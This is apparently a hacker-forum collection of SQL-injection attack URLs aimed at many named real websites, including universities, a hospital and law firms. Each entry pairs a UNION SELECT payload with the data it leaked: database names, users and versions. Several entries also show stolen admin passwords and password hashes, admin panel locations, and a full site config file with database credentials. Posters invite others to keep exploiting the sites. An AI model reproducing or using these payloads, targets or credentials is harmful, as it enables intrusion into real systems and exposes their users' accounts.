Code: http://www.cir.org.br/noticias.php?id=592+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22 cir_admin@localhost:cir_db:4.1.20
Code: http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),17--+ db info: Code: [email protected] : db14709_fvh_stage : 4.1.25-Debian_mt1
www.rnb-music.ru
Can't get output using concat.
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--
user():altero_rnb@localhost
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--
version():5.0.22
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--
database():altero_rnb
Tables:
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
Users (about 6.5k):
Login:
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--
Password:
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--
Admin: Nick: Altero Password: kexik408
Forum:
Nick:
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_members--
Password:
Code: http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_members--
Admin panel
Code: www.rnb-music.ru/admin
Access by IP(
PR:2 TIC:240
config.php
Code:
<?php
if (!defined('IN_CODE')) {
    exit("Not allowed to run this file directly.");
}

$dbname = 'altero_rnb'; // Name of your database
$dbuser = 'altero_rnb'; // Username used to access it
$dbpw = 'a12345'; // Password used to access it
$dbhost = 'localhost'; // Database host, usually 'localhost'
$database = 'mysql'; // Database type, currently only mysql is supported.
$pconnect = 0; // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear

// Table Settings
$tablepre = 'xmb_'; // Table-pre

// Path-settings
// In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
// And please, don't forget the / at the end...
$full_url = 'http://rnb-music.ru/konfa/';

// Other settings
// There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
// tags around each template. In those cases, change the following to false, or true to turn it back on.
// Default value: false;
$comment_output = true;

// Alternative mailer
// some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
// To get around this, we have included code which will contact a separate SMTP server of your
// choice, and will send the mail trough that. The following mailer-options are available:
// 'default' => php's internal mail() function. No additional values need to be set:
// (does not require a username/password/host/port)
// 'socket_SMTP' => a connection to the SMTP server trough sockets. Requires the username,
// password, host and port values to be entered correctly to work.
$mailer['type'] = 'default';

// mailer-options (for socket_SMTP only, currently)
$mailer['username'] = 'MAILER_USER';
$mailer['password'] = 'MAILER_PASS';
$mailer['host'] = 'MAILER_HOST';
$mailer['port'] = 'MAILER_PORT';

// Plugin Settings
$i = 1;
// Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
// To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.

// Start Plugin code
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code.

// Start Plugin code for plugin #2
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code for plugin #2

// To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.

// Registration settings
/***************
 * The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
 * this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
 ****************
 * The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
 * By default, they are not, meaning $allow_spec_q = false;
 * To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
 ****************
 * The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
 * Change the value to true to show them, or false to turn them off.
 * Default = true;
 ****************/
$ipcheck = 'off';
$allow_spec_q = true;
$show_full_info = false;

define('DEBUG', false);
// define('DEBUG', true);
?>
[PR 4] Code: http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8-- 4.1.20:db_opalomanpal_oman@localhost
[PR 2] Code: http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database(),user()),2,3-- 5.0.45-community:db_hostpark1:hostpark1@localhost
[PR 1] Code: http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),database(),user()) 4.0.27-icd1-log:corectadbrestige@localhost
[PR 0] Code: http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database(),user()),2-- 5.0.22:citysite_inf:citysite_red@localhost
PR: 6
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),database(),user()),40,41,42,43,44,45/*
5.0.22-log:bibume:rootume@localhost
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,table_name,40,41,42,43,44,45+from+information_schema.tables/*
bib_user
admin:50ea881c822098a867b5643eed614825
------------------------------------------------------------------------
PR: 5
http://www.lorin.fr/produits-categoriesenglish.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
4.0.25-standard-log:lorinlorin:[email protected]
Database Version: 5.0.27-log
Database name: poligipzk
User name: [email protected]

Database Version: 5.0.77-log
Database name: podnikatelsky_servises
User name: [email protected]

Database Version: 5.0.67-log
Database name: u179055
User name: [email protected]
root:32f82a1f2e69453c3356be43ef06d8cc
Admin panel: http://bsl-med.ru/admin/
http://aramis.obspm.fr/HORIZON/php/abstracts.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 4.0.16-standard:horizon:combes@localhost
http://www.che.gatech.edu {PR 5} Code: http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96-- Code: http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96-- 5.0.77:dynabot2:[email protected] Code: http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+information_schema.tables--
TIC - 40 PR - 4
Code: http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,password,file_priv)%20,4,5,6,7,8+from+mysql.user--+
User info:
Code: root:141091821ee9bcaa:Y
Code: http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8+from+mysql.user--+
db info:
Code: [email protected] : geostroy : 4.0.12-max-nt
Admin panel:
Code: www.geostroy.ru/admin
Code: http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/* 5.0.32-Debian_7etch1-log:cid:[email protected] Code: http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password)+from+users/*
http://www.gcuc.edu.gh/ (PR 4) Code: http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3/* 4.1.22-standard-log : gardenc_db : [email protected] users Code: http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,group_concat(username,0x3a,password),3+from+users/*
http://www.universalrights.net/news/display.php?id=5101+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*
by 4.1.9-nt:universalrights:AU20024480@localhost
http://www.satyalife.net/articles-display.php?id=-16+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
[email protected]:5.0.32-Debian_7etch5-log:domainkeskus_satyalife_cms
Admin panel: http://www.universalrights.net/login.php
pass:login admin:admin )))
http://www.jjwxc.net/topten.php?orderstr=1&timeid=-22+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6-- 4.0.27-hi4-log:selfnovel:[email protected]
Looks like a Chinese site, damn it))
Code: http://namnaren.ncm.gu.se/artikelregister/detail.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10-- db info: Code: root@localhost : nbaspub : 5.1.33-log
http://www.opcli.org/display.php?id=4+union+select+1,2,3,4+limit+1,1/* Database Version: 4.0.27-standard-log Database name: main2_opcli_org User name: [email protected]
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7-- 5.0.67-0.dotdeb.1-log:idep_lecroqavocats:[email protected]
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
Columns of the Users table, but after that I can't pull the data out; whoever wants to can keep working on it)
Code: http://www.agro-biz.com.ar/control_roya/news_view.php?id=-1+union+all+select+0,1,CONVERT(CONCAT_WS(CHAR(32,58,32),user(),database(),version())%20USING%20latin1),3,4,5,6,7,8,9-- db info: Code: [email protected] : agrobiz : 4.1.10a-Max
Site: http://www.auc.ca
SQL - Code: http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat_ws(CHAR(32,58,32),user(),database(),version()),5--
Returns: [email protected] : algomauniversity : 5.0.19-standard
Next, tables:
Code: http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,group_concat(table_name),5+from+information_schema.tables--
The table that gives results: modcentre_users
Columns in the modcentre_users table: user_id, password, name, email, access, note
That gives this link:
Code: http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat(0x3a,user_id,0x3a,0x3a,0x3a,password,0x3a,name,0x3a,email),5+from+modcentre_users--
And here are the final results: users